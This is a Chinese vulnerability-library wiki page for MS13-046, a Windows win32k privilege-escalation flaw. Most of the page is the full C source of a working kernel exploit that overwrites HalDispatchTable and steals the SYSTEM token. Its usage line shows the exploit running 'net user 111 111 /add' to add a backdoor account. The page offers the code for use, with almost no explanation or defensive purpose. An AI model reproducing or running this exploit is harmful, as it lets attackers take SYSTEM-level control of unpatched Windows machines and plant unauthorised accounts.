侧边栏
ms_漏洞库:ms13-046
MS13-046特权提升漏洞, 不是MS13-053字体引起的远程代码执行漏洞,微软在Patch Tuesday计划中发布了此漏洞补丁;
安全公告: http://technet.microsoft.com/zh-cn/security/bulletin/MS13-046
从公告中可以看出从Win XP到Win2012系统均受影响, 并且不局限于x86 x64平台, IA平台的Win系统也在受影响之列;
下载:ms13-046.rar
使用说明:
ShellExecute( NULL, "open", argv[1], argc > 2 ? argv[2] : NULL, NULL, SW_SHOW); [溢出程序名] [要执行的程序名] [附带参数(可空)] epathobj_exp32.exe cmd "net user 111 111 /add"
EXP代码:
- 13046.c
/* * thanks to: Tavis Ormandy & ProgmBoy & instruder * by [email][email protected][/email] * build by WDK7600 * tested on windows 2003 x64 en * - 1.ImageBase=0x10000 * - 2.wdk makefile.new disable DYNAMICBASE_FLAG=/dynamicbase */ #include <stdlib.h> #include <stdio.h> #include <STDARG.H> #include <stddef.h> #include <windows.h> #include <Shellapi.h> //#include <ntstatus.h> #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 #pragma comment(linker, "/SECTION:.text,ERW") // // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase. // // Tavis Ormandy <taviso () cmpxchg8b com>, March 2013 // POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN* pRegions = NULL; ULONG MaxRegions = 0; ULONG NumRegion = 0; HANDLE Mutex; // Copied from winddi.h from the DDK #define PD_BEGINSUBPATH 0x00000001 #define PD_ENDSUBPATH 0x00000002 #define PD_RESETSTYLE 0x00000004 #define PD_CLOSEFIGURE 0x00000008 #define PD_BEZIERS 0x00000010 #define ENABLE_SWITCH_DESKTOP 1 typedef struct _POINTFIX { ULONG x; ULONG y; } POINTFIX, *PPOINTFIX; // Approximated from reverse engineering. typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[4]; } PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord = {0}; PPATHRECORD ExploitRecordExit; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; // Not filled in PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[ 256 ]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[1]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; typedef INT ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG ); typedef INT ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG ); typedef INT ( __stdcall *NtReadVirtualMemory_)( HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T); typedef PVOID (__stdcall *PsGetCurrentProcess_)(); typedef PVOID (__stdcall *PsReferencePrimaryToken_)(PVOID Process); typedef INT (__stdcall *PsLookupProcessByProcessId_)(HANDLE ProcessId, PVOID *Process); NtQueryIntervalProfile_ NtQueryIntervalProfile; NtQuerySystemInformation_ NtQuerySystemInformation; NtReadVirtualMemory_ NtReadVirtualMemory; //#define __SHELL_CODE_MAGIC 0x11223344AABBCCDD typedef struct _ShellCodeInfo{ PVOID* MmUserProbeAddress; PVOID* WriteToHalDispatchTable; PVOID NtSetEaFile; PVOID* PsInitialSystemProcess; DWORD Pid; PsGetCurrentProcess_ PsGetCurrentProcess; PsLookupProcessByProcessId_ PsLookupProcessByProcessId; PsReferencePrimaryToken_ PsReferencePrimaryToken; } ShellCodeInfo, *PShellCodeInfo; ShellCodeInfo GlobalInfo; #if defined (_WIN64) #define MAX_FAST_REFS 15 #else #define MAX_FAST_REFS 7 #endif int __stdcall ShellCode(PVOID x, PVOID y, PShellCodeInfo* pInfo, PVOID w) { PShellCodeInfo info; //__SHELL_CODE_MAGIC; PVOID targetProcess, sysProcess, token; ULONG_PTR *p1, *p2; info = *pInfo; #ifdef _WIN64 /* FIX MmUserProbeAddress -> ((ULONG_PTR)(0x80000000000UI64 - 0x10000)) */ *info->MmUserProbeAddress = ((ULONG_PTR)(0x80000000000UI64 - 0x10000)); #else *info->MmUserProbeAddress = 0x7fff0000; #endif /* x64 4参数: rcx, rdx, r8, r9 -直接c3即可 */ *info->WriteToHalDispatchTable = info->NtSetEaFile; //if (info->PsLookupProcessByProcessId(info->Pid, &targetProcess) != 0) // return 0xC0000019; p1 = targetProcess = info->PsGetCurrentProcess(); p2 = sysProcess = *info->PsInitialSystemProcess; token = info->PsReferencePrimaryToken(sysProcess); /* token 4bit->refcnt */ while ((*p2 & ~MAX_FAST_REFS) != token){ p1++; p2++; } *p1 = token; return 0xC0000018; } DWORD WINAPI WatchdogThread(LPVOID Parameter) { // // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. // printf("Watchdog thread %d waiting on Mutex\n", GetCurrentThreadId()); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. // while (NumRegion--) DeleteObject(pRegions[NumRegion]); printf("InterlockedExchangePointer(0x%p, 0x%p);\n", &PathRecord->next, &ExploitRecord); InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { printf("Mutex object did not timeout, list not patched\n"); } return 0; } static int do_expoite(PVOID* addr, PVOID val, PBYTE cmd, PBYTE argv) { HDC Device; HDESK Desk; ULONG PointNum; HANDLE Thread; ULONG Size; INT ret = -1; PBYTE tmp = NULL; // // Create our PATHRECORD in user space we will get added to the EPATHOBJ // pathrecord chain. // PathRecord = (PPATHRECORD)VirtualAlloc( NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); memset(PathRecord, sizeof(PATHRECORD), 0xCC); // //PathRecord->next = self //stuck here to wait for WatchdogThread set PathRecord->next = ExploitRecord // PathRecord->next = PathRecord; PathRecord->prev = (PPATHRECORD)(0x42424242); PathRecord->flags = 0; //init ExploitRecordExit node ExploitRecordExit = (PPATHRECORD)VirtualAlloc( NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); ExploitRecordExit->next = NULL; ExploitRecordExit->next = NULL; ExploitRecordExit->flags = PD_BEGINSUBPATH; ExploitRecordExit->count = 0; // //ensue ExploitRecord.next -> valid address and end record //ExploitRecord.next -> ExploitRecordExit node // ExploitRecord.next = (PPATHRECORD)ExploitRecordExit; ExploitRecord.prev = (PPATHRECORD)addr; ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH; ExploitRecord.count = 4; printf("Alllocated PATHRECORDS:%p %p %p\n", PathRecord, ExploitRecord, ExploitRecordExit); tmp = malloc((int)ShellCode); printf("tmp->%p\n", tmp); printf("Creating complex bezier path with %x\n", (ULONG)(PathRecord) >> 4); // // Generate a large number of Belier Curves made up of pointers to our // PATHRECORD object. // for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { #ifdef _WIN64 Points[PointNum].x = (ULONG)(PathRecord) >> 4; Points[PointNum].y = 0;//(ULONG)(PathRecord) >> 4; #else Points[PointNum].x = (ULONG)(PathRecord) >> 4; Points[PointNum].y = (ULONG)(PathRecord) >> 4; #endif PointTypes[PointNum] = PT_BEZIERTO; } // // Switch to a dedicated desktop so we don't spam the visible desktop with // our Lines (Not required, just stops the screen from redrawing slowly). // Desk = CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL); SetThreadDesktop(Desk); MaxRegions = MAX_REGIONS; pRegions = realloc(NULL, sizeof(HRGN) * MaxRegions); Mutex = CreateMutex(NULL, TRUE, NULL); Device = GetDC(NULL); // // Spawn a thread to cleanup // Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL); // // We need to cause a specific AllocObject() to fail to trigger the // exploitable condition. To do this, I create a large number of rounded // rectangular regions until they start failing. I don't think it matters // what you use to exhaust paged memory, there is probably a better way. // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // failure. Seriously, do some damn QA Microsoft, wtf. // // for (Size = 1 << 26; Size; Size >>= 1) { while (pRegions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)){ NumRegion++; if (NumRegion >= MaxRegions){ MaxRegions = MaxRegions*2; pRegions = realloc(pRegions, sizeof(HRGN) * MaxRegions); } } } printf("Allocated %u/%u HRGN objects\n", NumRegion, MaxRegions); printf("Flattening curves...\n"); // // Begin filling the free list with our points. // for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); if (PathRecord->next != PathRecord){ ret = NtReadVirtualMemory((HANDLE)-1, tmp, tmp, (SIZE_T)ShellCode, GlobalInfo.WriteToHalDispatchTable ); if (ret == 0){ printf("[*] exploit... %p!\n", &GlobalInfo); NtQueryIntervalProfile(&GlobalInfo, &ret); ret = 0; } break; } EndPath(Device); } printf("cleaning up...\n"); // // If we reach here, we didn't trigger the condition. Let the other thread know. // ReleaseMutex(Mutex); CloseDesktop(Desk); ReleaseDC(NULL, Device); WaitForSingleObject(Thread, INFINITE); VirtualFree(PathRecord, sizeof(PATHRECORD), MEM_RELEASE); VirtualFree(ExploitRecordExit, sizeof(PATHRECORD), MEM_RELEASE); free(tmp); free(pRegions); CloseHandle(Thread); return ret; } int main(int argc, char **argv) { HMODULE ntoskrnl = NULL; LONG ret; BOOL bRet = FALSE; HMODULE ntdll; PRTL_PROCESS_MODULES mod = (PRTL_PROCESS_MODULES)&mod; PBYTE osBase; HMODULE hDllOs; ULONG NeededSize; INT expCount = 0; STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.cb = sizeof(si); //GlobalInfo.Pid = GetCurrentProcessId(); //pi.dwProcessId; ntdll = GetModuleHandle("ntdll.dll"); NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress(ntdll, "NtQueryIntervalProfile"); NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress(ntdll, "NtQuerySystemInformation"); NtReadVirtualMemory = (NtReadVirtualMemory_)GetProcAddress(ntdll, "NtReadVirtualMemory"); if (!NtQueryIntervalProfile || !NtQuerySystemInformation || !NtReadVirtualMemory){ printf("error get ntdll fun address\n"); return -1; } /* * NtQuerySystemInformation query sys module info * STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 */ ret = NtQuerySystemInformation(11, mod, 4, &NeededSize); if (0xC0000004 == ret){ mod = malloc(NeededSize); ret = NtQuerySystemInformation(11, mod, NeededSize, NULL); } printf("ntos:%s->%p\n", mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName, mod->Modules[0].ImageBase); osBase = mod->Modules[0].ImageBase; hDllOs = LoadLibraryA((LPCSTR)(mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName)); if (!hDllOs){ printf("error reload os kernel\n"); return -1; } free(mod); GlobalInfo.WriteToHalDispatchTable = (PBYTE)GetProcAddress(hDllOs, "HalDispatchTable") - (PBYTE)hDllOs + osBase + sizeof(PVOID); GlobalInfo.PsInitialSystemProcess = (PBYTE)GetProcAddress(hDllOs, "PsInitialSystemProcess") - (PBYTE)hDllOs + osBase; GlobalInfo.PsReferencePrimaryToken = (PBYTE)GetProcAddress(hDllOs, "PsReferencePrimaryToken") - (PBYTE)hDllOs + osBase; GlobalInfo.PsGetCurrentProcess = (PBYTE)GetProcAddress(hDllOs, "PsGetCurrentProcess") - (PBYTE)hDllOs + osBase; GlobalInfo.PsLookupProcessByProcessId = (PBYTE)GetProcAddress(hDllOs, "PsLookupProcessByProcessId") - (PBYTE)hDllOs + osBase; GlobalInfo.MmUserProbeAddress = (PBYTE)GetProcAddress(hDllOs, "MmUserProbeAddress") - (PBYTE)hDllOs + osBase; GlobalInfo.NtSetEaFile = (PBYTE)GetProcAddress(hDllOs, "NtSetEaFile") - (PBYTE)hDllOs + osBase; printf("HalDispatchTable - %p MmUserProbeAddress - %p NtSetEaFile - %p \n", GlobalInfo.WriteToHalDispatchTable, GlobalInfo.MmUserProbeAddress, GlobalInfo.NtSetEaFile); while (do_expoite(GlobalInfo.MmUserProbeAddress, NULL, argv[1], argc > 2 ? argv[2] : NULL) != 0){ if (expCount > 0x10) break; } printf("[*]exe %s\n", argv[1]); if (!CreateProcess(NULL, // No module name (use command line) argv[1], NULL, NULL, FALSE, 0, //CREATE_NEW_CONSOLE | CREATE_SUSPENDED, NULL, NULL, &si, &pi)){ printf("CreateProcess failed (%d)./n", GetLastError()); return -1; } //ResumeThread(pi.hThread); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return 0; }
你需要登录发表评论。
ms_漏洞库/ms13-046.txt · 最后更改: 2020/05/16 19:19 (外部编辑)
页面工具
